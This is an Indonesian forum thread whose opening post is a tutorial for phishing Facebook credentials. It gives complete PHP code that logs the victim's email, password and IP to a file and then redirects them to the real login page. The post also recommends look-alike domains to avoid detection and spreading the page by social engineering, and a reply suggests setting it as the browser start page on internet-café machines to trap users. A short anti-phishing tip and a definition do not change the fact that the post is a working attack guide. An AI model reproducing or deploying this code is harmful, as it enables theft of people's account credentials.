˜”SEEKERS OF THE TRUTH”˜
˜”*•.Welcome To D.O.I.•*”˜

˜”Welcome To The Largest Community”˜

Please Register Before Log in

˜”SEEKERS OF THE TRUTH”˜


 
IndeksP O R T A LCalendarFAQPencarianGalleryAnggotaGroupPendaftaranLogin
Member baru segera registrasi dan introduce u'r self di Member Introduction..!!!
.:: Welcome To The Largest Detective Only Inside Community ::.
T-shirt DOI siap Produksi, Berminat click link ini
˜”*•. Join The Chatbox  DOI, Free Talk Unlimited .•*”˜
 List Reputations and points week case (Detective Award DOI)
Share cerita detektif, Jokes Case, Easy Game dan  Ilmu Hacking, di Forum DOI...!!!
= Ikuti lomba Desain Header DOI dengan mengclick link ini =
Download koleksi novel detective di Books Room DOI
Ngaku doiners Holic??? Ayo tambahkan "INSIDERS" di belakang nick FBmu
Punya saran & kritikan tulis di Brain-Storming DOI untuk di diskusikan bersama

Share | 
 

 Cara hack menggunakan tehnik Physing

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
Kaito Kuroba
Developer DOI
Developer DOI


Officers : -
Jumlah posting : 262
Point : 57 Detective Award : -
Reputation : 3
Speciality : Break Real Case, Hack Id, Mondai o sakusei suru
Lokasi : Sukabumi

PostSubyek: Cara hack menggunakan tehnik Physing   Tue Jun 01, 2010 9:11 am

ok kita langsung aja menuju tutorial singkatnya

Pertama, lo bikin file log.php abis itu, lo ganti extensionnya jadi .php bukan .txt. trus, lo upload ke tempat hostingan lo. inget! tempat lo ngehosting pagenya harus support PHP. biasanya sih banyak yg menggunakan jasa ripway.com

abis itu, lo buat fake login pagenya, namanya facebook.htm ato apalah namanya. suka2 lo. jangan lupa, ganti extensionnya jadi .htm!
nanti line dibawah ini lo ganti pake log.php dari hostingan lo sendiri. lo cari aja
[You must be registered and logged in to see this link.]
selesai, abis itu lo upload pagenya.

terakhir, lo buat logfile buat nyimpen semua hasil password dan account yang udah diambil. logfile ini lo biarin aja kosong. ga usah lo ketik macem-macem.
kalo udah, lo upload filenya.

OYA, JANGAN LUPA! SEMUA FILE YANG UDAH DIUPLOAD LO MASUKIN KE FOLDER YANG SAMA. JANGAN MISAH2 SATU SAMA LAIN.

nah, kalo udah jadi, hasilnya akan jadi seperti ini
[You must be registered and logged in to see this link.]

persis kayak aslinya kan? tapi lo liat, address barnya. bukan facebook, melainkan [You must be registered and logged in to see this link.]
untuk masalah URL, lo bisa ganti addressnya pake web hosting gratis yang lain biar susah ketauan. jadi ga pake ripway. contoh URLnya fesbook, facebok, facebuuk, faceboot, kreasi lo aja. ato lo bisa make metode social engineering buat nyebarin fake login ini


PostSubyek: hack pasword fb menggunakan phising Sat 03 Oct 2009, 02:54
ok kita langsung aja menuju tutorial singkatnya * mau nulis banyak kagak ada yang bayar *

Pertama, lo bikin file log.php abis itu, lo ganti extensionnya jadi .php bukan .txt. trus, lo upload ke tempat hostingan lo. inget! tempat lo ngehosting pagenya harus support PHP. biasanya sih banyak yg menggunakan jasa ripway.com

abis itu, lo buat fake login pagenya, namanya facebook.htm ato apalah namanya. suka2 lo. jangan lupa, ganti extensionnya jadi .htm!
nanti line dibawah ini lo ganti pake log.php dari hostingan lo sendiri. lo cari aja
[You must be registered and logged in to see this link.]
selesai, abis itu lo upload pagenya.

terakhir, lo buat logfile buat nyimpen semua hasil password dan account yang udah diambil. logfile ini lo biarin aja kosong. ga usah lo ketik macem-macem.
kalo udah, lo upload filenya.

OYA, JANGAN LUPA! SEMUA FILE YANG UDAH DIUPLOAD LO MASUKIN KE FOLDER YANG SAMA. JANGAN MISAH2 SATU SAMA LAIN.

nah, kalo udah jadi, hasilnya akan jadi seperti ini
[You must be registered and logged in to see this link.]

persis kayak aslinya kan? tapi lo liat, address barnya. bukan facebook, melainkan [You must be registered and logged in to see this link.]
untuk masalah URL, lo bisa ganti addressnya pake web hosting gratis yang lain biar susah ketauan. jadi ga pake ripway. contoh URLnya fesbook, facebok, facebuuk, faceboot, kreasi lo aja. ato lo bisa make metode social engineering buat nyebarin fake login ini.

nah, last but not least, tips dari gw, buat ngehindarin phising/ fakelogin kayak bgini, jangan asal klik link. biasanya spam yang suka nyebarin bginian. ato misalnya udah terlanjur keklik, lo perhatiin address barnya. sesuai ga ama halaman web yang aslinya ??? coz GW dah pernah kena 1x




log php

Code:
<?php
$file = "logs.txt";
$username = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");

$handle = fopen($file, 'a');
fwrite($handle, " ");
fwrite($handle, "n");
fwrite($handle, "Email: ");
fwrite($handle, "$username");
fwrite($handle, "n");
fwrite($handle, "Password: ");
fwrite($handle, "$password");
fwrite($handle, "n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "n");
fwrite($handle, " ");
fwrite($handle, "n");
fwrite($handle, "n");
fclose($handle);
echo "<script LANGUAGE="JavaScript">
<!--
window.location="https://login.facebook.com/login.php?login_attempt=1";
// -->
</script>";
?>
oryginal post by : crucafix [You must be registered and logged in to see this link.]

Phising adalah suatu bentuk penipuan yang dicirikan dengan percobaan untuk mendapatkan informasi peka, seperti kata sandi dan kartu kredit, dengan menyamar sebagai orang atau bisnis yang terpercaya dalam sebuah komunikasi elektronik resmi, seperti posnel atau pesan instan. Istilah phishing dalam bahasa Inggris berasal dari kata fishing (’memancing’), dalam hal ini berarti memancing informasi keuangan dan kata sandi pengguna, Phising juga didefinisikan sebagai sebuah kegiatan memancing pemakai komputer di internet (user) agar mau memberikan informasi data diri pemakai (username) dan kata sandinya (password) pada suatu website yang sudah di-deface. Phising biasanya diarahkan kepada pengguna online banking. Isian data pemakai dan password yang vital yang telah dikirim akhirnya akan menjadi milik penjahat tersebut dan digunakan untuk belanja dengan kartu kredit atau uang rekening milik korbannya.

Pada phising facebook ini, si pelaku hanya berusaha untuk mengambil username dan password saja karena saat mencoba login user dihantarkan pada halaman Address Not Found. Tampilan scam page untuk phising facebook ini bisa di ganti apa aja .

Pertama kali istilah "phising" dipublikasikan oleh American Online Usernet Newgroup pada tanggal 2 Januari 1996 dan mulai menjamur pada tahun 2004. Pada tahun tersebut, perkembangan phising di dunia maya berkembang dengan pesat. Total kerugian akibat phising ditahun 2004 mencapai US$929 juta dengan melibatkan lebih dari 15.000 situs yang menjadi korbannya.

Kebanyakan dari teknik phising adalah melakukan manipulasi sebuah link di dalam email yang akan dikirimkan ke korbannya. Dengan adanya email, praktek phising terbilang mudah hanya dengan melakukan spam pada email dan kemudian menunggu korbannya untuk masuk kedalam tipuannya. Untuk meyakinkan bahwa link yang diberikan asli, biasanya si hacker ini akan membuat sebuah web yang sama persis dengan yang aslinya, perbedaannya URL yang dituju berbeda dengan link yang diberikan. Untuk orang awam yang kurang mengerti tentang web mungkin akan cenderung mudah ditipu, hal ini lah yang harus menjadi waspada untuk Anda agar tidak terkena korban penipuan. Antara link yang diberikan dengan address yang dituju tidak sesuai. Anda hanya tau dan akan menyangka bahwa link tersebut adalah benar karena dikirim melalui email.


14D Have a Nice Day
Kembali Ke Atas Go down
Lihat profil user http://detectiveevolution.blogspot.com
Insiders09
Administrator
Administrator


Status :
Officers : Master Logic
Jumlah posting : 570
Point : 37 Detective Award : 1 Bronze
Case Maker : 13
Case Solver : 5
Reputation : -8
Speciality : Logic case
Lokasi : Mkzr Baker street NW 09

PostSubyek: Re: Cara hack menggunakan tehnik Physing   Tue Jun 01, 2010 5:22 pm

tepuk tangan tepuk tangan tepuk tangan tepuk tangan tepuk tangan
Kembali Ke Atas Go down
Lihat profil user
K
Newbie
Newbie


Jumlah posting : 5
Point : 9 Reputation : 0

PostSubyek: Re: Cara hack menggunakan tehnik Physing   Sat Jun 05, 2010 7:21 am

hooo, teknik phising facebook rupanya....

sekedar tambahan, teknik fake login kaya gini kayanya cocok diaplikasikan di warnet. dengan memasang start page dibrowser dengan tampilan langsung fake login facebook....

tapi kayanya ga bisa lagi bikin script .html yang berhubungan dengan fakelogin facebook deh dengah menggunakan hostingan free. soalnya di TOS udah tertulis. saya pernah nyoba, langsung dibanned akun saya....di 000webhost. huahaahahaaha

yang mesti dipastiin mungkin hostingan yang dipake ama teknik phising kaya gini palingan dengan hostingan berbayar doang kali ya? ngakak

kecuali script .php-nya bisa dijalankan via localhost warnet-nya! huahaahaha....

ini mah soceng....tapi masih efektif sih buat ngejebak orang orang cupu ngakak
Kembali Ke Atas Go down
Lihat profil user
Kaito Kuroba
Developer DOI
Developer DOI


Officers : -
Jumlah posting : 262
Point : 57 Detective Award : -
Reputation : 3
Speciality : Break Real Case, Hack Id, Mondai o sakusei suru
Lokasi : Sukabumi

PostSubyek: Re: Cara hack menggunakan tehnik Physing   Mon May 16, 2011 10:49 pm

hummm
Kembali Ke Atas Go down
Lihat profil user http://detectiveevolution.blogspot.com
Sponsored content




PostSubyek: Re: Cara hack menggunakan tehnik Physing   Today at 10:52 am

Kembali Ke Atas Go down
 
Cara hack menggunakan tehnik Physing
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» CARA MENGGUNAKAN PADDOCK TAPI 1 ORANG................?
» Cara Menggunakan Keyboard Sebagai Mouse
» [ASK] Ada Yang Tau Cara Edit Gear Menggunakan GIMP ?
» [ASK]Cara edit gear design pake GIMP
» cara root device anda tanpa menguunakan pc

Permissions in this forum:Anda tidak dapat menjawab topik
˜”SEEKERS OF THE TRUTH”˜ :: Information Technology :: Tips dan Trick-
Navigasi: